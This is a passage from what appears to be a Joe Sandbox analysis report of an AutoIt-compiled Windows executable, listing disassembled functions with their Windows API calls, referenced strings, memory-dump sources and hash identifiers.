                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: 695264db8d3e8608e18c9cabe6c686d6a88351d4b171f383560321d87a1b3082
                                                      • Instruction ID: e61060f2789e8026e82955e26e5728e9bb6138f39bbec9145580645e6109560b
                                                      • Opcode Fuzzy Hash: 695264db8d3e8608e18c9cabe6c686d6a88351d4b171f383560321d87a1b3082
                                                      • Instruction Fuzzy Hash: E2128B30600A41EFDB20CF24C988BA9BBF5FF45320F548569E995DB662CB31EC42CB91
                                                      Function 00AD77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00AD77F1
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AD78B0
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AD78EE
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AD7900
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AD7946
                                                      • GetClientRect.USER32(00000000,?), ref: 00AD7952
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AD7996
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AD79A5
                                                      • GetStockObject.GDI32(00000011), ref: 00AD79B5
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00AD79B9
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AD79C9
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AD79D2
                                                      • DeleteDC.GDI32(00000000), ref: 00AD79DB
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AD7A07
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AD7A1E
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AD7A59
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AD7A6D
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AD7A7E
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AD7AAE
                                                      • GetStockObject.GDI32(00000011), ref: 00AD7AB9
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AD7AC4
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AD7ACE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: dc4e022d9759f81cf435bdab2d36165b305bfeb6aa8463cc98d319b367a78840
                                                      • Instruction ID: bd14101d211deeb73ec507665fbf9528495b6f787a56ebdf68b4414ba312b04f
                                                      • Opcode Fuzzy Hash: dc4e022d9759f81cf435bdab2d36165b305bfeb6aa8463cc98d319b367a78840
                                                      • Instruction Fuzzy Hash: 2FA16471A41219BFEB14DBA4DD4AFAF7BB9EB48710F104115FA15AB2E0DB70AD01CB60
                                                      Function 00ACAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACAF89
                                                      • GetDriveTypeW.KERNEL32(?,00AEFAC0,?,\\.\,00AEF910), ref: 00ACB066
                                                      • SetErrorMode.KERNEL32(00000000,00AEFAC0,?,\\.\,00AEF910), ref: 00ACB1C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 85fa1ba27f283e16eeb36ae34f9178fc4250e770da45c83085efbffda26c2b79
                                                      • Instruction ID: c837f53ff72511bd24cbc342bb249eddb926a89eb2c76726ae19cca6e399f554
                                                      • Opcode Fuzzy Hash: 85fa1ba27f283e16eeb36ae34f9178fc4250e770da45c83085efbffda26c2b79
                                                      • Instruction Fuzzy Hash: 5551A630A91345AFCB00DB50CAA3EBD73F0AB14742F69415DE40AA71E1C736AE81DB62
                                                      Function 00A66A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 81b3547aa4d3d785b6832831ab10d4adb0f81a85538491a778c8c93a4a844017
                                                      • Instruction ID: 902310a7ba40c2d509ac5420e6f4f92ee5b50306ab78a1468b28288b53f8d17f
                                                      • Opcode Fuzzy Hash: 81b3547aa4d3d785b6832831ab10d4adb0f81a85538491a778c8c93a4a844017
                                                      • Instruction Fuzzy Hash: 7F81F671B40245FBCF24FBA0CE92FAE77B8AF15740F044025F945AA1D2EB61EA51C7A1
                                                      Function 00AEAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00AEAB99
                                                      • SetTextColor.GDI32(?,?), ref: 00AEAB9D
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00AEABB3
                                                      • GetSysColor.USER32(0000000F), ref: 00AEABBE
                                                      • CreateSolidBrush.GDI32(?), ref: 00AEABC3
                                                      • GetSysColor.USER32(00000011), ref: 00AEABDB
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AEABE9
                                                      • SelectObject.GDI32(?,00000000), ref: 00AEABFA
                                                      • SetBkColor.GDI32(?,00000000), ref: 00AEAC03
                                                      • SelectObject.GDI32(?,?), ref: 00AEAC10
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AEAC2F
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AEAC46
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AEAC5B
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AEACA7
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AEACCE
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00AEACEC
                                                      • DrawFocusRect.USER32(?,?), ref: 00AEACF7
                                                      • GetSysColor.USER32(00000011), ref: 00AEAD05
                                                      • SetTextColor.GDI32(?,00000000), ref: 00AEAD0D
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AEAD21
                                                      • SelectObject.GDI32(?,00AEA869), ref: 00AEAD38
                                                      • DeleteObject.GDI32(?), ref: 00AEAD43
                                                      • SelectObject.GDI32(?,?), ref: 00AEAD49
                                                      • DeleteObject.GDI32(?), ref: 00AEAD4E
                                                      • SetTextColor.GDI32(?,?), ref: 00AEAD54
                                                      • SetBkColor.GDI32(?,?), ref: 00AEAD5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: 55397adcb626496b6bba41b40a30c08f711e7a39a537b6dc690225007de62b54
                                                      • Instruction ID: ec3f7fa081d2df98057eab210e5d3b54aabf488de579c586cf5da07f2f5aac7d
                                                      • Opcode Fuzzy Hash: 55397adcb626496b6bba41b40a30c08f711e7a39a537b6dc690225007de62b54
                                                      • Instruction Fuzzy Hash: C2615F71900258EFDF11DFE9DC88EAE7B79EB48320F208225F915AB2A1D7719D41DB90
                                                      Function 00AE8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AE8D34
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AE8D45
                                                      • CharNextW.USER32(0000014E), ref: 00AE8D74
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AE8DB5
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AE8DCB
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AE8DDC
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AE8DF9
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00AE8E45
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AE8E5B
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AE8E8C
                                                      • _memset.LIBCMT ref: 00AE8EB1
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AE8EFA
                                                      • _memset.LIBCMT ref: 00AE8F59
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AE8F83
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AE8FDB
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00AE9088
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AE90AA
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE90F4
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE9121
                                                      • DrawMenuBar.USER32(?), ref: 00AE9130
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00AE9158
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: 45c1beb3eac8906ece75d22173b37e798974af8678ce1586c3e7167573090b1b
                                                      • Instruction ID: 8a9b0865b75ecb47d58cb1f8e774577e79119c928fa054697eea494a26c546d0
                                                      • Opcode Fuzzy Hash: 45c1beb3eac8906ece75d22173b37e798974af8678ce1586c3e7167573090b1b
                                                      • Instruction Fuzzy Hash: 51E18370900299AFDF20DF66CC88EEF7BB9EF05710F108155F919AA290DB749A81DF61
                                                      Function 00AE4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00AE4C51
                                                      • GetDesktopWindow.USER32 ref: 00AE4C66
                                                      • GetWindowRect.USER32(00000000), ref: 00AE4C6D
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AE4CCF
                                                      • DestroyWindow.USER32(?), ref: 00AE4CFB
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AE4D24
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AE4D42
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AE4D68
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00AE4D7D
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AE4D90
                                                      • IsWindowVisible.USER32(?), ref: 00AE4DB0
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AE4DCB
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AE4DDF
                                                      • GetWindowRect.USER32(?,?), ref: 00AE4DF7
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00AE4E1D
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00AE4E37
                                                      • CopyRect.USER32(?,?), ref: 00AE4E4E
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00AE4EB9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 05d3db28a0a7021cb447e8a014d1d73903aeed8e60e36f36b2da147a45895f45
                                                      • Instruction ID: 5123e66e144a2679875d4cc1052b0561205f211066d6972bfcb06129a7c214d6
                                                      • Opcode Fuzzy Hash: 05d3db28a0a7021cb447e8a014d1d73903aeed8e60e36f36b2da147a45895f45
                                                      • Instruction Fuzzy Hash: 4DB15971608381AFDB04DF65C989B6ABBE9FF88314F00891CF5999B2A1D771EC05CB91
                                                      Function 00AC46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AC46E8
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AC470E
                                                      • _wcscpy.LIBCMT ref: 00AC473C
                                                      • _wcscmp.LIBCMT ref: 00AC4747
                                                      • _wcscat.LIBCMT ref: 00AC475D
                                                      • _wcsstr.LIBCMT ref: 00AC4768
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AC4784
                                                      • _wcscat.LIBCMT ref: 00AC47CD
                                                      • _wcscat.LIBCMT ref: 00AC47D4
                                                      • _wcsncpy.LIBCMT ref: 00AC47FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: f7f6067dfd9e36b2bed4104b471bc163eb53da11599703e74ff775124e8d44a9
                                                      • Instruction ID: f918d37f723e7df67a907b7a4426e2a884d2a2196b139ec62b8afa54d0bcf8ff
                                                      • Opcode Fuzzy Hash: f7f6067dfd9e36b2bed4104b471bc163eb53da11599703e74ff775124e8d44a9
                                                      • Instruction Fuzzy Hash: E241F572A042107BDB10B7748D42FBF77BCEF45710F04406AF904A6182EB75AA0197A9
                                                      Function 00A627D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A628BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 00A628C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A628EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 00A628F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 00A6291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A62939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A62949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A6297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A62990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00A629AE
                                                      • GetStockObject.GDI32(00000011), ref: 00A629CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A629D5
                                                        • Part of subcall function 00A62344: GetCursorPos.USER32(?), ref: 00A62357
                                                        • Part of subcall function 00A62344: ScreenToClient.USER32(00B267B0,?), ref: 00A62374
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000001), ref: 00A62399
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000002), ref: 00A623A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,00A61256), ref: 00A629FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 49d7f910e67959c341854fdf5139b68ca5bc9a50c6d61c5269f94b949173cae2
                                                      • Instruction ID: c80abd56c4df85f51f6773e7f68d23e58c9d652901e82ca50e17abad0109fecb
                                                      • Opcode Fuzzy Hash: 49d7f910e67959c341854fdf5139b68ca5bc9a50c6d61c5269f94b949173cae2
                                                      • Instruction Fuzzy Hash: 22B18171A0064AEFDF14DFA8DD85BAE7BB4FB18314F108129FA15EB2A0DB749941CB50
                                                      Function 00AE4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AE40F6
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AE41B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: 0236947d0acc40b7f3ba83ffe04c63f907cc7c39989747d4c3c0054be4093376
                                                      • Instruction ID: 58e9a357cec98e3a9234ba612ae81d8fb1962eb12f955b9d827b5f8d96b53934
                                                      • Opcode Fuzzy Hash: 0236947d0acc40b7f3ba83ffe04c63f907cc7c39989747d4c3c0054be4093376
                                                      • Instruction Fuzzy Hash: 65A15F302143429FCB14EF61CA51EAAB7FABF98314F14496CB8969B792DB30ED05CB51
                                                      Function 00AD52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00AD5309
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00AD5314
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00AD531F
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00AD532A
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00AD5335
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00AD5340
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00AD534B
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00AD5356
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00AD5361
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00AD536C
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00AD5377
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00AD5382
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00AD538D
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00AD5398
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00AD53A3
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00AD53AE
                                                      • GetCursorInfo.USER32(?), ref: 00AD53BE
                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00AD53E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                      • String ID:
                                                      • API String ID: 3215588206-0
                                                      • Opcode ID: 4f8bc3bb012f400ed3f39ec6f19c2a3e08ec5730e9d04bd11dd263f9e97ca4c0
                                                      • Instruction ID: 0b566664809a44142638384d505744da3d7823525e6db64d6d4ea7f37a568e38
                                                      • Opcode Fuzzy Hash: 4f8bc3bb012f400ed3f39ec6f19c2a3e08ec5730e9d04bd11dd263f9e97ca4c0
                                                      • Instruction Fuzzy Hash: 26415170E04319AADB109FBA8C4996FFFF8EF51B50B10452FE509E7291DAB8A5018E61
                                                      Function 00ABAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ABAAA5
                                                      • __swprintf.LIBCMT ref: 00ABAB46
                                                      • _wcscmp.LIBCMT ref: 00ABAB59
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ABABAE
                                                      • _wcscmp.LIBCMT ref: 00ABABEA
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00ABAC21
                                                      • GetDlgCtrlID.USER32(?), ref: 00ABAC73
                                                      • GetWindowRect.USER32(?,?), ref: 00ABACA9
